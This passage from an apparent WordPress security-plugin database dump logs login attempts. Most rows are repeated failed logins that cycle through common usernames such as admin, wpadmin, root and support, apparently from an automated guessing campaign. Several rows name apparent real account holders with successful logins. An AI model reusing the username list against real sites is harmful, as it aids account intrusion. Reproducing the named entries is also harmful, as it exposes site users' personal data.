Firefox/62.0'),(1336,4041,1564021838.493132,1,'loginFailInvalidUsername','test',0,'\0\0\0\0\0\0\0\0\0\0>','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1337,4042,1564021841.832496,1,'loginFailInvalidUsername','sam-mi',0,'\0\0\0\0\0\0\0\0\0\0>','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1338,4043,1564021845.766822,1,'loginFailInvalidUsername','wpadmin',0,'\0\0\0\0\0\0\0\0\0\0>','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1339,4044,1564021849.458370,1,'loginFailInvalidUsername','chris',0,'\0\0\0\0\0\0\0\0\0\0>','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1340,4045,1564021852.851521,1,'loginFailInvalidUsername','admin2',0,'\0\0\0\0\0\0\0\0\0\0>','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1341,4046,1564021856.574356,1,'loginFailInvalidUsername','support',0,'\0\0\0\0\0\0\0\0\0\0>','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1342,4047,1564021860.259380,1,'loginFailInvalidUsername','daniel',0,'\0\0\0\0\0\0\0\0\0\0>','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1343,4048,1564021863.834587,1,'loginFailInvalidUsername','michael',0,'\0\0\0\0\0\0\0\0\0\0>','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1344,4049,1564021867.857392,1,'loginFailInvalidUsername','admin1',0,'\0\0\0\0\0\0\0\0\0\0>','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1345,4050,1564021871.260657,1,'loginFailInvalidUsername','administrador',0,'\0\0\0\0\0\0\0\0\0\0>','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1346,4214,1564035182.259660,1,'loginFailInvalidUsername','wpadmin',0,'\0\0\0\0\0\0\0\0\0\0[yl&','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1347,4215,1564035186.274035,1,'loginFailInvalidUsername','chris',0,'\0\0\0\0\0\0\0\0\0\0[yl&','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1348,4216,1564035189.805515,1,'loginFailInvalidUsername','admin2',0,'\0\0\0\0\0\0\0\0\0\0[yl&','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1349,4217,1564035193.089267,1,'loginFailInvalidUsername','support',0,'\0\0\0\0\0\0\0\0\0\0[yl&','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1350,4218,1564035197.984764,1,'loginFailInvalidUsername','michael',0,'\0\0\0\0\0\0\0\0\0\0[yl&','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1351,4219,1564035202.043076,1,'loginFailInvalidUsername','admin1',0,'\0\0\0\0\0\0\0\0\0\0[yl&','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1352,4281,1564042277.059552,0,'loginOK','nazeer',3,'\0\0\0\0\0\0\0\0\0\0G','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36'),(1353,4670,1564096108.972245,1,'loginFailInvalidUsername','admin1',0,'\0\0\0\0\0\0\0\0\0\07','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1354,4712,1564100258.252406,1,'loginFailInvalidUsername','admin-2',0,'\0\0\0\0\0\0\0\0\0\0|','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1355,4713,1564100263.626532,1,'loginFailInvalidUsername','david',0,'\0\0\0\0\0\0\0\0\0\0|','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1356,4714,1564100268.780244,1,'loginFailInvalidUsername','test',0,'\0\0\0\0\0\0\0\0\0\0|','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1357,4715,1564100274.103536,1,'loginFailInvalidUsername','sam-mi',0,'\0\0\0\0\0\0\0\0\0\0|','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1358,4716,1564100279.593338,1,'loginFailInvalidUsername','wpadmin',0,'\0\0\0\0\0\0\0\0\0\0|','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1359,4717,1564100284.922058,1,'loginFailInvalidUsername','chris',0,'\0\0\0\0\0\0\0\0\0\0|','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1360,4718,1564100290.224150,1,'loginFailInvalidUsername','admin2',0,'\0\0\0\0\0\0\0\0\0\0|','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1361,4719,1564100295.454233,1,'loginFailInvalidUsername','support',0,'\0\0\0\0\0\0\0\0\0\0|','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1362,4720,1564100300.693663,1,'loginFailInvalidUsername','daniel',0,'\0\0\0\0\0\0\0\0\0\0|','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1363,4721,1564100306.959278,1,'loginFailInvalidUsername','michael',0,'\0\0\0\0\0\0\0\0\0\0|','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1364,4722,1564100312.186506,1,'loginFailInvalidUsername','admin1',0,'\0\0\0\0\0\0\0\0\0\0|','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1365,4947,1564127253.891129,1,'loginFailInvalidUsername','michael',0,'\0\0\0\0\0\0\0\0\0\0\"P;t','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1366,4948,1564127259.703218,1,'loginFailInvalidUsername','admin1',0,'\0\0\0\0\0\0\0\0\0\0\"P;t','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1367,4949,1564127265.771248,1,'loginFailInvalidUsername','administrador',0,'\0\0\0\0\0\0\0\0\0\0\"P;t','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1368,4950,1564127272.099731,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0\"P;t','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1369,4992,1564130356.387996,1,'loginFailInvalidUsername','alex',0,'\0\0\0\0\0\0\0\0\0\0\r','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1370,4993,1564130363.157978,1,'loginFailInvalidUsername','Service',0,'\0\0\0\0\0\0\0\0\0\0\r','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1371,4994,1564130367.850581,1,'loginFailInvalidUsername','admin-2',0,'\0\0\0\0\0\0\0\0\0\0\r','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1372,4995,1564130372.701552,1,'loginFailInvalidUsername','david',0,'\0\0\0\0\0\0\0\0\0\0\r','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1373,4996,1564130377.586041,1,'loginFailInvalidUsername','test',0,'\0\0\0\0\0\0\0\0\0\0\r','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1374,4997,1564130382.240923,1,'loginFailInvalidUsername','sam-mi',0,'\0\0\0\0\0\0\0\0\0\0\r','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1375,4998,1564130387.740690,1,'loginFailInvalidUsername','wpadmin',0,'\0\0\0\0\0\0\0\0\0\0\r','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1376,4999,1564130394.478492,1,'loginFailInvalidUsername','chris',0,'\0\0\0\0\0\0\0\0\0\0\r','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1377,5000,1564130399.986551,1,'loginFailInvalidUsername','admin2',0,'\0\0\0\0\0\0\0\0\0\0\r','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1378,5001,1564130407.084438,1,'loginFailInvalidUsername','support',0,'\0\0\0\0\0\0\0\0\0\0\r','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1379,5002,1564130416.540039,1,'loginFailInvalidUsername','daniel',0,'\0\0\0\0\0\0\0\0\0\0\r','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1380,5003,1564130423.741307,1,'loginFailInvalidUsername','michael',0,'\0\0\0\0\0\0\0\0\0\0\r','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1381,5248,1564163269.255581,1,'loginFailInvalidUsername','webmaster',0,'\0\0\0\0\0\0\0\0\0\0DC','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1382,5249,1564163275.155509,1,'loginFailInvalidUsername','user',0,'\0\0\0\0\0\0\0\0\0\0DC','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1383,5250,1564163285.490039,1,'loginFailInvalidUsername','editor',0,'\0\0\0\0\0\0\0\0\0\0DC','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1384,5251,1564163292.112986,1,'loginFailInvalidUsername','root',0,'\0\0\0\0\0\0\0\0\0\0DC','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1385,5252,1564163298.449000,1,'loginFailInvalidUsername','alex',0,'\0\0\0\0\0\0\0\0\0\0DC','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1386,5253,1564163314.781166,1,'loginFailInvalidUsername','support',0,'\0\0\0\0\0\0\0\0\0\0DC','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1387,5254,1564163321.145780,1,'loginFailInvalidUsername','daniel',0,'\0\0\0\0\0\0\0\0\0\0DC','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1388,5498,1564189313.074726,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0r','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1389,5650,1564207345.510211,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0!','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1390,5708,1564213203.212701,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\09[','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1391,5712,1564214537.677515,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0B','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1392,5779,1564221085.588369,1,'loginFailInvalidUsername','administrator',0,'\0\0\0\0\0\0\0\0\0\0>','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1393,5780,1564221088.686578,1,'loginFailInvalidUsername','webmaster',0,'\0\0\0\0\0\0\0\0\0\0>','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1394,5781,1564221091.695355,1,'loginFailInvalidUsername','user',0,'\0\0\0\0\0\0\0\0\0\0>','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1395,5782,1564221094.676557,1,'loginFailInvalidUsername','feed',0,'\0\0\0\0\0\0\0\0\0\0>','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1396,5783,1564221097.560546,1,'loginFailInvalidUsername','editor',0,'\0\0\0\0\0\0\0\0\0\0>','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1397,5784,1564221100.523292,1,'loginFailInvalidUsername','root',0,'\0\0\0\0\0\0\0\0\0\0>','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1398,5785,1564221103.354399,1,'loginFailInvalidUsername','alex',0,'\0\0\0\0\0\0\0\0\0\0>','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1399,5786,1564221105.990922,1,'loginFailInvalidUsername','Service',0,'\0\0\0\0\0\0\0\0\0\0>','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1400,5787,1564221109.032400,1,'loginFailInvalidUsername','admin-2',0,'\0\0\0\0\0\0\0\0\0\0>','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1401,5788,1564221112.026872,1,'loginFailInvalidUsername','david',0,'\0\0\0\0\0\0\0\0\0\0>','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1402,5789,1564221114.945262,1,'loginFailInvalidUsername','test',0,'\0\0\0\0\0\0\0\0\0\0>','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1403,5790,1564230044.238099,1,'loginFailInvalidUsername','administrator',0,'\0\0\0\0\0\0\0\0\0\0ŷ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1404,5791,1564230048.130851,1,'loginFailInvalidUsername','webmaster',0,'\0\0\0\0\0\0\0\0\0\0ŷ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1405,5792,1564230051.583249,1,'loginFailInvalidUsername','user',0,'\0\0\0\0\0\0\0\0\0\0ŷ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1406,5793,1564230054.613434,1,'loginFailInvalidUsername','feed',0,'\0\0\0\0\0\0\0\0\0\0ŷ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1407,5794,1564230057.274742,1,'loginFailInvalidUsername','editor',0,'\0\0\0\0\0\0\0\0\0\0ŷ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1408,5795,1564230060.103848,1,'loginFailInvalidUsername','root',0,'\0\0\0\0\0\0\0\0\0\0ŷ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1409,5796,1564230062.877896,1,'loginFailInvalidUsername','alex',0,'\0\0\0\0\0\0\0\0\0\0ŷ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1410,5797,1564230065.677026,1,'loginFailInvalidUsername','Service',0,'\0\0\0\0\0\0\0\0\0\0ŷ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1411,5798,1564230068.474528,1,'loginFailInvalidUsername','admin-2',0,'\0\0\0\0\0\0\0\0\0\0ŷ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1412,5799,1564230071.401527,1,'loginFailInvalidUsername','david',0,'\0\0\0\0\0\0\0\0\0\0ŷ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1413,5800,1564230075.486076,1,'loginFailInvalidUsername','test',0,'\0\0\0\0\0\0\0\0\0\0ŷ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1414,6495,1564304208.850701,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1415,6496,1564304412.822450,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0-(','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1416,6781,1564323745.253760,1,'loginFailInvalidUsername','sam-mi',0,'\0\0\0\0\0\0\0\0\0\0[yl&','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1417,6782,1564323749.908353,1,'loginFailInvalidUsername','wpadmin',0,'\0\0\0\0\0\0\0\0\0\0[yl&','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1418,6783,1564323754.783360,1,'loginFailInvalidUsername','chris',0,'\0\0\0\0\0\0\0\0\0\0[yl&','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1419,7049,1564383381.006998,0,'loginOK','nazeer',3,'\0\0\0\0\0\0\0\0\0\0G','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36'),(1420,7110,1564396407.129167,1,'loginFailInvalidUsername','administrator',0,'\0\0\0\0\0\0\0\0\0\0_oi','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1421,7111,1564396413.150742,1,'loginFailInvalidUsername','webmaster',0,'\0\0\0\0\0\0\0\0\0\0_oi','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1422,7112,1564396417.464085,1,'loginFailInvalidUsername','user',0,'\0\0\0\0\0\0\0\0\0\0_oi','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1423,7113,1564396421.881269,1,'loginFailInvalidUsername','feed',0,'\0\0\0\0\0\0\0\0\0\0_oi','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1424,7114,1564396426.972740,1,'loginFailInvalidUsername','editor',0,'\0\0\0\0\0\0\0\0\0\0_oi','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1425,7115,1564396434.151442,1,'loginFailInvalidUsername','root',0,'\0\0\0\0\0\0\0\0\0\0_oi','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1426,7116,1564396440.078903,1,'loginFailInvalidUsername','alex',0,'\0\0\0\0\0\0\0\0\0\0_oi','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1427,7117,1564396444.814876,1,'loginFailInvalidUsername','Service',0,'\0\0\0\0\0\0\0\0\0\0_oi','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1428,7118,1564396449.157545,1,'loginFailInvalidUsername','admin-2',0,'\0\0\0\0\0\0\0\0\0\0_oi','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1429,7119,1564396453.453131,1,'loginFailInvalidUsername','david',0,'\0\0\0\0\0\0\0\0\0\0_oi','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1430,7120,1564396458.037263,1,'loginFailInvalidUsername','test',0,'\0\0\0\0\0\0\0\0\0\0_oi','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1431,7121,1564407195.020957,1,'loginFailInvalidUsername','administrator',0,'\0\0\0\0\0\0\0\0\0\0B','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1432,7122,1564407205.562556,1,'loginFailInvalidUsername','webmaster',0,'\0\0\0\0\0\0\0\0\0\0B','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1433,7123,1564407217.462885,1,'loginFailInvalidUsername','user',0,'\0\0\0\0\0\0\0\0\0\0B','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1434,7124,1564407224.897285,1,'loginFailInvalidUsername','feed',0,'\0\0\0\0\0\0\0\0\0\0B','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1435,7125,1564407235.145115,1,'loginFailInvalidUsername','editor',0,'\0\0\0\0\0\0\0\0\0\0B','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1436,7126,1564407244.456651,1,'loginFailInvalidUsername','root',0,'\0\0\0\0\0\0\0\0\0\0B','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1437,7127,1564407252.627920,1,'loginFailInvalidUsername','alex',0,'\0\0\0\0\0\0\0\0\0\0B','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1438,7128,1564407260.331438,1,'loginFailInvalidUsername','Service',0,'\0\0\0\0\0\0\0\0\0\0B','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1439,7129,1564407269.681226,1,'loginFailInvalidUsername','admin-2',0,'\0\0\0\0\0\0\0\0\0\0B','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1440,7130,1564407277.593245,1,'loginFailInvalidUsername','david',0,'\0\0\0\0\0\0\0\0\0\0B','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1441,7131,1564407284.936666,1,'loginFailInvalidUsername','test',0,'\0\0\0\0\0\0\0\0\0\0B','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1442,7132,1564418040.712927,1,'loginFailValidUsername','Imraan Wajoodeen CA(SA)',1,'\0\0\0\0\0\0\0\0\0\0i','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0'),(1443,7132,1564418040.728578,1,'loginFailValidUsername','Imraan Wajoodeen CA(SA)',1,'\0\0\0\0\0\0\0\0\0\0i','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0'),(1444,7133,1564419480.823470,1,'loginFailValidUsername','Imraan Wajoodeen CA(SA)',1,'\0\0\0\0\0\0\0\0\0\0i','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0'),(1445,7133,1564419480.833579,1,'loginFailValidUsername','Imraan Wajoodeen CA(SA)',1,'\0\0\0\0\0\0\0\0\0\0i','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0'),(1446,7134,1564419488.431850,0,'loginOK','Imraan Wajoodeen CA(SA)',1,'\0\0\0\0\0\0\0\0\0\0i','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0'),(1447,7278,1564435737.698259,1,'loginFailInvalidUsername','feed',0,'\0\0\0\0\0\0\0\0\0\0/[','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1448,7279,1564435746.495068,1,'loginFailInvalidUsername','Service',0,'\0\0\0\0\0\0\0\0\0\0/[','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1449,7280,1564435751.198251,1,'loginFailInvalidUsername','admin-2',0,'\0\0\0\0\0\0\0\0\0\0/[','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1450,7281,1564435758.748433,1,'loginFailInvalidUsername','test',0,'\0\0\0\0\0\0\0\0\0\0/[','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1451,7282,1564435764.838043,1,'loginFailInvalidUsername','sam-mi',0,'\0\0\0\0\0\0\0\0\0\0/[','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1452,7283,1564435771.453771,1,'loginFailInvalidUsername','wpadmin',0,'\0\0\0\0\0\0\0\0\0\0/[','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1453,7284,1564435779.215942,1,'loginFailInvalidUsername','support',0,'\0\0\0\0\0\0\0\0\0\0/[','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1454,7285,1564435786.070392,1,'loginFailInvalidUsername','daniel',0,'\0\0\0\0\0\0\0\0\0\0/[','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1455,7286,1564435794.342140,1,'loginFailInvalidUsername','administrador',0,'\0\0\0\0\0\0\0\0\0\0/[','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1456,7470,1564472281.040071,0,'loginOK','nazeer',3,'\0\0\0\0\0\0\0\0\0\0G','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36'),(1457,7675,1564556996.958063,0,'loginOK','nazeer',3,'\0\0\0\0\0\0\0\0\0\0G','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36'),(1458,8002,1564671881.874909,1,'loginFailValidUsername','Imraan Wajoodeen CA(SA)',1,'\0\0\0\0\0\0\0\0\0\0i%','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0'),(1459,8002,1564671881.907538,1,'loginFailValidUsername','Imraan Wajoodeen CA(SA)',1,'\0\0\0\0\0\0\0\0\0\0i%','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0'),(1460,8003,1564671898.104060,1,'loginFailInvalidUsername','companyregistrator',0,'\0\0\0\0\0\0\0\0\0\0i%','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0'),(1461,8004,1564671906.728227,1,'loginFailInvalidUsername','companyregistrator',0,'\0\0\0\0\0\0\0\0\0\0i%','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0'),(1462,8005,1564671922.681767,1,'loginFailValidUsername','Imraan Wajoodeen CA(SA)',1,'\0\0\0\0\0\0\0\0\0\0i%','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0'),(1463,8005,1564671922.714340,1,'loginFailValidUsername','Imraan Wajoodeen CA(SA)',1,'\0\0\0\0\0\0\0\0\0\0i%','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0'),(1464,8006,1564671931.712653,1,'loginFailValidUsername','Imraan Wajoodeen CA(SA)',1,'\0\0\0\0\0\0\0\0\0\0i%','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0'),(1465,8006,1564671931.754392,1,'loginFailValidUsername','Imraan Wajoodeen 